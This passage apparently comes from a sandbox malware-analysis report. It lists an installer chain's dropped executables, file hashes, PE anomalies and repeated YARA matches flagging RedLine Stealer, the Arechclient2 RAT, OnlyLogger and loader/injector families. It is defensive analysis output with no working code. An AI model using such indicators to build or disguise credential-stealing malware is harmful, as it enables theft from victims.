                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65415019_2_00007FF72F654150
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F921019_2_00007FF72F5F9210
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5EC1C019_2_00007FF72F5EC1C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64A1B019_2_00007FF72F64A1B0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\09xU.exE B45C9DE845522095BBFA55166B519B2BE36A08CEA688491B9F339E862E79C3BA
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: String function: 00007FF72F5E2470 appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: String function: 00007FF72F5E4A00 appears 139 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: String function: 00007FF72F5C8550 appears 99 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: String function: 00007FF72F5C8890 appears 58 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: String function: 00007FF72F5C82C0 appears 92 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: String function: 00496E20 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: String function: 00496AA0 appears 44 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: String function: 00482860 appears 136 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: String function: 00496CB0 appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: String function: 00403204 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: String function: 00418D80 appears 122 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980
                  Source: Mon17b5f403be4d8d6b.exe.1.drStatic PE information: Resource name: DLL type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Source: libstdc++-6.dll.1.drStatic PE information: Number of sections : 12 > 10
                  Source: setup_install.exe.1.drStatic PE information: Number of sections : 16 > 10
                  Source: libcurl.dll.1.drStatic PE information: Number of sections : 19 > 10
                  Source: libcurlpp.dll.1.drStatic PE information: Number of sections : 18 > 10
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe, 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe, 00000000.00000002.1685110021.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 22.0.Mon178817e243.exe.e60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 1.3.setup_installer.exe.30bf192.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 2.2.setup_install.exe.6b280000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 1.3.setup_installer.exe.2f30000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 29.2.Mon179e1058f256.exe.17f0e50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.3.Mon179e1058f256.exe.3140000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.3.setup_installer.exe.2f66740.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.3.setup_installer.exe.2f8e26e.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
